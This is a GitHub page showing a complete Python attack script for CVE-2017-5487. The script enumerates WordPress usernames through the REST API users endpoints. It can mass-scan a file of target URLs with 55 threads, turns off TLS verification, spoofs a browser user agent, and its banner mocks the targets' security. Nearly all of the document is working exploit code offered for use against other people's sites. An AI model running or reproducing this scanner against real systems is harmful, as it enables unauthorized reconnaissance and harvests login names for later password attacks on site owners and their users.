-
Notifications
You must be signed in to change notification settings - Fork 1
/
CVE-2017-5487.py
105 lines (90 loc) · 5.41 KB
/
CVE-2017-5487.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
#!/bin/python3
import time
import requests
import argparse
import concurrent.futures
from concurrent.futures import ThreadPoolExecutor
from rich.console import Console
from urllib3 import disable_warnings
from urllib3.exceptions import InsecureRequestWarning
from alive_progress import alive_bar
disable_warnings(InsecureRequestWarning)
user_agent = {'User-Agent': 'Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16'}
color = Console()
def fetch_wordpress_users(target_url):
wordpress_api_endpoints = [
"/?rest_route=/wp/v2/users/",
"/wp-json/wp/v2/users/",
]
for endpoint in wordpress_api_endpoints:
url = f"{target_url}{endpoint}"
response = requests.get(url, timeout=7, headers=user_agent, verify=False, allow_redirects=False)
response_text = response.text
if response.status_code == 200:
user_data = response.json()
if user_data:
for user in user_data:
color.print(f"[bold green][[/bold green][bold cyan]+[/bold cyan][bold green]][/bold green] [bold cyan]{target_url.ljust(50)}[/bold cyan]", "[bold green][[/bold green]" + "[bold yellow]" + user['slug'] + "[/bold yellow]" + "[bold green]][/bold green]")
return
def process_file(file):
try:
with open(file, 'r') as url_file:
urls = [url.strip() for url in url_file]
if not urls:
color.print("[red][ERROR][/red] [/bold green]No targets found in the file.[/bold green]")
return
color.print(f"[bold yellow][!][/bold yellow] [bold green]Scanning[/bold green] [red]{len(urls)}[/red] [bold green]targets in[/bold green] [red]{file}[/red]")
print("")
start_time = time.time()
completed_tasks = []
failed_tasks = []
with alive_bar(len(urls), title='Scanning Targets', bar='classic', enrich_print=False) as bar:
with ThreadPoolExecutor(max_workers=55) as executor:
future_to_url = {executor.submit(fetch_wordpress_users, url): url for url in urls}
for future in concurrent.futures.as_completed(future_to_url):
url = future_to_url[future]
try:
future.result()
completed_tasks.append(url)
except Exception:
failed_tasks.append((url))
bar()
end_time = time.time()
elapsed_time = end_time - start_time
print("")
color.print(f"[bold yellow][!][/bold yellow] [bold green]Finished scanning[/bold green] [red]{len(completed_tasks)}[/red] [bold green]out of [/bold green][red]{len(urls)}[/red] [bold green]targets.[/bold green]")
color.print(f"[bold yellow][!][/bold yellow] [bold green]Elapsed Time:[/bold green] [red]{elapsed_time:.2f}[/red] [bold green]seconds[/bold green]")
except FileNotFoundError:
color.print("[red][ERROR][red] [bold green]That file does not exist my friend :-)[/bold green]")
exit()
def ascii_art():
color.print("""[bold green]
/$$$$$$ /$$ /$$ /$$$$$$$$ /$$$$$$ /$$$$$$ /$$ /$$$$$$$$ /$$$$$$$ /$$ /$$ /$$$$$$ /$$$$$$$$
/$$__ $$| $$ | $$| $$_____/ /$$__ $$ /$$$_ $$ /$$$$ |_____ $$/ | $$____/ | $$ | $$ /$$__ $$|_____ $$/
| $$ \__/| $$ | $$| $$ |__/ \ $$| $$$$\ $$|_ $$ /$$/ | $$ | $$ | $$| $$ \ $$ /$$/
| $$ | $$ / $$/| $$$$$ /$$$$$$ /$$$$$$/| $$ $$ $$ | $$ /$$//$$$$$$| $$$$$$$ | $$$$$$$$| $$$$$$/ /$$/
| $$ \ $$ $$/ | $$__/|______//$$____/ | $$\ $$$$ | $$ /$$/|______/|_____ $$|_____ $$ >$$__ $$ /$$/
| $$ $$ \ $$$/ | $$ | $$ | $$ \ $$$ | $$ /$$/ /$$ \ $$ | $$| $$ \ $$ /$$/
| $$$$$$/ \ $/ | $$$$$$$$ | $$$$$$$$| $$$$$$/ /$$$$$$ /$$/ | $$$$$$/ | $$| $$$$$$/ /$$/
\______/ \_/ |________/ |________/ \______/ |______/|__/ \______/ |__/ \______/ |__/
[/bold green]
[cyan]--[/cyan][yellow]===[[/yellow] [cyan]Coded with [#FF69B4]<3[/#FF69B4] by K3ysTr0K3R[/cyan] [yellow]]===[/yellow][cyan]--[/cyan]
[cyan]--[/cyan][yellow]===[[/yellow] [cyan]Brought to you by NERDS[/cyan] ;) [yellow]]===[/yellow][cyan]--[/cyan]
[cyan]--[/cyan][yellow]===[[/yellow] [cyan]Your Security makes me wanna go lolololol[/cyan] [yellow]]===[/yellow][cyan]--[/cyan]
""")
def main():
ascii_art()
parser = argparse.ArgumentParser(description='A PoC for CVE-2017-5487 - WordPress user enumeration')
parser.add_argument('-u', '--url', help='Target URL of the WordPress site to gather usernames')
parser.add_argument('-f', '--file', help='File containing URLs to gather usernames')
args = parser.parse_args()
if args.url:
target_url = args.url
color.print(f"[bold yellow][!][/bold yellow] [bold green]Scanning[/bold green] [bold green]target url[/bold green] [red]{target_url}[/red]")
print("")
fetch_wordpress_users(target_url)
elif args.file:
file = args.file
process_file(file)
if __name__ == "__main__":
main()